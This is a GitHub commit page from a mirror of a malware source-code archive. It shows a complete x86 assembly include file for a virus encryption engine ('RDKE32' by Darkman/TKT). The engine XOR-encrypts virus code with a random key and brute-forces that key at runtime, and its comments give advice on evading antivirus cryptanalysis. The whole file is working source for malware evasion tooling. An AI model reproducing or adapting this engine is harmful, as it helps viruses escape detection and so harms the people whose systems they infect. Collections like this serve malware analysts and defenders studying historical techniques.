daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-16 15:59:24 +00:00
Code Issues Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
vxunderground
2020-10-09 21:56:39 -05:00
committed by GitHub
parent cb8e4ddb00
commit a5fc35f165
69 changed files with 14340 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
libs/VirTool.Win32.Cryptor.Rdk.inc
+240
View File
@@ -0,0 +1,240 @@
comment *
ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
ßßßÛÛÛÛÛÛ ÜÜ ßßß ßßß ÜÜÜ ÛÛÛÛÛÛßßß
±ÛÛÛÛ ÛÛÛÛÛÛ ÛÛÛÛÛÛ ÛÛÛÛ°
ÛÛÛÛ ÛÛÛÛÛÛ ²ÛÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ± ÜÛÛÛÛ² ÛÛÛÛ
°ÛÛÛÛ ÛÛÛÛÛßÛÛÛÛß ÛÛÛÛ
±ÛÛÛÛ ÛÛÛÛ² ÛÛÜÜ ÛÛÛÛ°
ÜÜÜÜÜÜÜÜÜÜÜÜÜ ²ÛÛÛÛ ÛÛÛÛ± ÛÛÛÛ²Ü ÛÛÛÛ± ÜÜÜÜÜÜÜÜÜÜÜÜ
Û ÛÛÛÛÛ ÛÛÛÛ² ²ÛÛÛÛÛ° ÛÛÛÛ² Û
Û ÛÛÛÛÛ ÜÛÛÛÛÛ ²ÛÛÛÛ² ÛÛÛÛÛ Û
ßÜ ßßßßß ßßßß ßßßß ßßßßß Üß
ÜßßßßßßßßßßßßßßßßþThe Knight TemplarsþßßßßßßßßßßßßßßßÜ
Û Û
Û Random Decoding Key Engine 32-bit v 1.0 [RDKE32] Û
Û Code by Û
Û Darkman/TKT Û
Û Û
ßÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜß
Do not use this engine to encrypt known plaintext such as the actual virus
code. It is possible to decrypt known plaintext encrypted with this
engine using the X-RAY technique, also known as cryptanalysis. You can read
more about this technique in "Detecting oh, roughly every polymorphic engine
out there", an article by Rhincewind/VLAD, published in VLAD Magazine issue
4. Billy Belcebu/iKx did this mistake in Win32.Legacy using his Internal
ENCryptor v 1.0 [iENC], a Random Decoding Key (RDK) engine using a 8-bit
eXclusive OR (XOR) algorithm to encrypt the actual virus in 19 different
blocks.
Length of Random Decoding Key Engine 32-bit v 1.0 [RDKE32]: 171 bytes.
*
hash_size equ (0a0h/08h)
_RDKE32Encrypt struc
_lpHash dd ?
_lpBuffer dd ?
_dwNumberOfBytesToHashAndEncrypt dd ?
_dwSecurityLevel dd ?
ends
_RDKE32Decrypt struc
_lpHash dd ?
_lpBuffer dd ?
_dwNumberOfBytesToDecrypt dd ?
ends
_pushad struc
_edi dd ?
_esi dd ?
_ebp dd ?
_esp dd ?
_ebx dd ?
_edx dd ?
_ecx dd ?
_eax dd ?
ends
rdke32_begin:
; RDKE32Encrypt
;
;
; The RDKE32Encrypt function creates a hash and encrypts data.
;
; VOID RDKE32Encrypt(
; LPVOID lpHash // data buffer to receive hash
; LPVOID lpBuffer // data buffer of data to hash and encrypt
; DWORD dwNumberOfBytesToHashAndEncrypt // number of bytes to hash and
; // encrypt
; DWORD dwSecurityLevel // security level
; );
;
; Parameters
; lpHash
; [out] Pointer to the buffer that receives the hash.
; lpBuffer
; [out] Pointer to the buffer containing the data to be hashed and encrypted.
; dwNumberOfBytesToHashAndEncrypt
; [in] Specifies the number of bytes to be hashed and encrypted.
; dwSecurityLevel
; [in] Specifies the security level of the encryption. The higher it is the
; longer it will take for RDKE32Decrypt to bruteforce and decrypt the
; encrypted data.
;
; Return Values
; This function does not return a value.
RDKE32Encrypt proc ; Random Decoding Key Engine 32-bit
; v 1.00 [RDKE32] encryptor
pushad
mov edi,[esp._lpHash+size _pushad+04h]
; Pointer to the buffer that receives
; the hash
mov ebx,[esp._lpBuffer+size _pushad+04h]
; Pointer to the buffer containing the
; data to be hashed and encrypted
mov ecx,[esp._dwNumberOfBytesToHashAndEncrypt+size _pushad+04h]
; Specifies the number of bytes to be
; hashed and encrypted
mov eax,[esp._dwSecurityLevel+size _pushad+04h]
; Specifies the security level
call SHA1, edi, ecx, ebx
insecure_key:
call GetRandomNumberWithinRange
call test_key_security
jz insecure_key
call cryptor
popad
ret size _RDKE32Encrypt
endp
; RDKE32Decrypt
;
;
; The RDKE32Decrypt function creates a hash and encrypts data.
;
; VOID RDKE32Decrypt(
; LPVOID lpHash // data buffer of hash
; LPVOID lpBuffer // data buffer of data to decrypt
; DWORD dwNumberOfBytesToDecrypt // number of bytes to decrypt
; );
;
; Parameters
; lpHash
; [in] Pointer to the buffer containing the hash.
; lpBuffer
; [out] Pointer to the buffer containing the data to decrypted.
; dwNumberOfBytesToDecrypt
; [in] Specifies the number of bytes to be decrypted.
;
; Return Values
; This function does not return a value.
RDKE32Decrypt proc ; Random Decoding Key Engine 32-bit
; v 1.00 [RDKE32] decryptor
pushad
mov edi,[esp._lpHash+size _pushad+04h]
; Pointer to the buffer of the hash
mov ebx,[esp._lpBuffer+size _pushad+04h]
; Pointer to the buffer containing the
; data to be decrypted
mov ecx,[esp._dwNumberOfBytesToDecrypt+size _pushad+04h]
; Specifies the number of bytes to be
; decrypted
sub esp,hash_size
mov esi,esp ; ESI = pointer to the hash
xor edx,edx
bruteforce_loop:
inc edx ; EDX = 32-bit encryption/decryption
; key
call test_key_security
jz bruteforce_loop
call cryptor
call SHA1, esi, ecx, ebx
pushad
push (hash_size/04h)
pop ecx
rep cmpsd ; Succesfully decrypted the buffer to
; be decrypted?
popad
je RDKE32Decrypt_exit
call cryptor
jmp bruteforce_loop
RDKE32Decrypt_exit:
add esp,hash_size
popad
ret size _RDKE32Decrypt
endp
test_key_security proc ; Test the security of the 32-bit key
pushad
test eax,eax ; Insecure key?
jz test_key_exit
push 03h
pop ecx
test_key_loop:
mov eax,edx ; EDX = 32-bit encryption/decryption
; key
mov ebx,ecx
_test_key_loop:
rol eax,08h
test al,dl
jz test_next_key
cmp al,dl ; Insecure key?
je test_key_exit
test_next_key:
dec ebx
jnz _test_key_loop
rol edx,08h
loop test_key_loop
inc ecx ; Secure key
test_key_exit:
popad
ret
endp
cryptor proc ; 32-bit encryptor/decryptor
pushad
crypt_loop:
inc ecx
test dl,dl ; Insecure key?
jz dont_crypt
dec ecx
xor [ebx],dl
inc ebx
dont_crypt:
rol edx,08h
loop crypt_loop
popad
ret
endp
db ' [RDKE32] '
rdke32_end:
rdke32_size equ (rdke32_end-rdke32_begin)